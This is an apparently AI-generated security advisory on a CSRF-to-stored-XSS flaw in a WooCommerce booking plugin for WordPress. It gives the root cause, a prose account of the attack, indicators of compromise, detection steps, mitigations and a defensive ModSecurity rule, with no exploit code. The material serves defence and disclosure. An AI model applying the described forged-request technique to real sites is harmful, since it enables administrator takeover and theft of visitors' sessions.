CVE-2025-58991 Overview
CVE-2025-58991 is a Cross-Site Request Forgery (CSRF) vulnerability [CWE-352] in the Cristiano Zanca WooCommerce Booking Bundle Hours WordPress plugin. The flaw affects all versions up to and including 0.7.4. Successful exploitation chains CSRF with Stored Cross-Site Scripting (XSS), allowing attackers to persist malicious JavaScript inside the WordPress admin context.
An unauthenticated attacker can trick an authenticated administrator into submitting a forged request. The request writes attacker-controlled script content into plugin-managed data, which later executes in any visitor or administrator session that renders the affected page.
Critical Impact
A single click by an authenticated WordPress administrator on an attacker-controlled link can plant persistent JavaScript that runs against every subsequent visitor of the affected page.
Affected Products
- Cristiano Zanca WooCommerce Booking Bundle Hours plugin for WordPress
- All versions from n/a through 0.7.4
- WordPress sites running WooCommerce with this plugin installed
Discovery Timeline
- 2025-09-09 - CVE-2025-58991 published to NVD
- 2026-04-28 - Last updated in NVD database
Technical Details for CVE-2025-58991
Vulnerability Analysis
The vulnerability stems from missing anti-CSRF protections on state-changing endpoints in the WooCommerce Booking Bundle Hours plugin. Administrative actions that update plugin settings or stored data do not validate a WordPress nonce or verify request origin. An attacker can craft an HTML form or fetch request that targets these endpoints.
When an authenticated administrator visits an attacker-controlled page, the browser automatically attaches WordPress session cookies. The forged request executes with full administrator privileges. Because the affected fields are not sanitized against script content, the attacker can inject persistent JavaScript payloads, producing a Stored XSS condition.
The stored payload executes whenever the affected admin or front-end page is rendered. This enables session theft, administrative account takeover, plugin and theme installation, and pivoting deeper into the WordPress environment. The user interaction requirement is low — a single click on an attacker-controlled URL.
Root Cause
The plugin omits nonce verification with wp_verify_nonce() and check_admin_referer() on settings handlers. It also fails to sanitize stored input with wp_kses() or comparable filters. The absence of both controls converts a CSRF flaw into a persistent XSS primitive.
Attack Vector
The attack is network-based and requires user interaction. An attacker hosts a malicious page containing an auto-submitting form pointing at the vulnerable plugin endpoint. After luring an authenticated administrator to the page, the browser issues the forged POST request. The payload is stored server-side and executes in the context of the WordPress site, crossing privilege boundaries (scope change).
No verified public exploit code is available. Technical details are documented in the Patchstack Vulnerability Report.
Detection Methods for CVE-2025-58991
Indicators of Compromise
- Unexpected <script>, onerror, or onload content inside plugin-managed booking configuration fields stored in the wp_options or plugin-specific tables.
- Administrator POST requests to plugin endpoints originating from external Referer headers or without a valid nonce parameter.
- New or modified administrator accounts, plugins, or themes appearing shortly after an admin session.
- Outbound requests from visitor browsers to unfamiliar domains after loading pages that render booking content.
Detection Strategies
- Audit WordPress database tables for HTML or JavaScript content in fields managed by the WooCommerce Booking Bundle Hours plugin.
- Inspect web server access logs for POST requests to plugin admin handlers with missing or malformed nonce parameters.
- Correlate administrator login events with subsequent configuration changes to identify session-riding patterns.
Monitoring Recommendations
- Enable WordPress audit logging to capture plugin setting changes, user creation, and file modifications.
- Deploy a Web Application Firewall (WAF) ruleset that flags cross-origin POST submissions to /wp-admin/ endpoints.
- Monitor for Content Security Policy (CSP) violation reports indicating inline script execution on booking pages.
How to Mitigate CVE-2025-58991
Immediate Actions Required
- Deactivate the WooCommerce Booking Bundle Hours plugin until a patched release is verified by the vendor.
- Review plugin configuration entries and remove any unexpected HTML or JavaScript content from stored values.
- Force a password reset and session invalidation for all WordPress administrator accounts.
- Audit recently created users, installed plugins, and modified theme files for unauthorized changes.
Patch Information
No fixed version is listed in the available advisory data. Versions through 0.7.4 remain vulnerable. Monitor the Patchstack advisory and the WordPress plugin repository for an updated release.
Workarounds
- Restrict access to /wp-admin/ by IP allowlist at the web server or WAF layer to reduce CSRF exposure.
- Enforce a strict Content Security Policy that disallows inline scripts on booking-related pages.
- Require administrators to use a dedicated browser profile with no cross-site browsing during privileged sessions.
- Apply virtual patching rules in a WAF to block requests to plugin endpoints missing a valid _wpnonce parameter.
# Example WAF rule (ModSecurity) to block CSRF on plugin endpoints
SecRule REQUEST_URI "@contains /wp-admin/admin-post.php" \
"chain,deny,status:403,id:1058991,msg:'CVE-2025-58991 CSRF block'"
SecRule &ARGS:_wpnonce "@eq 0"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
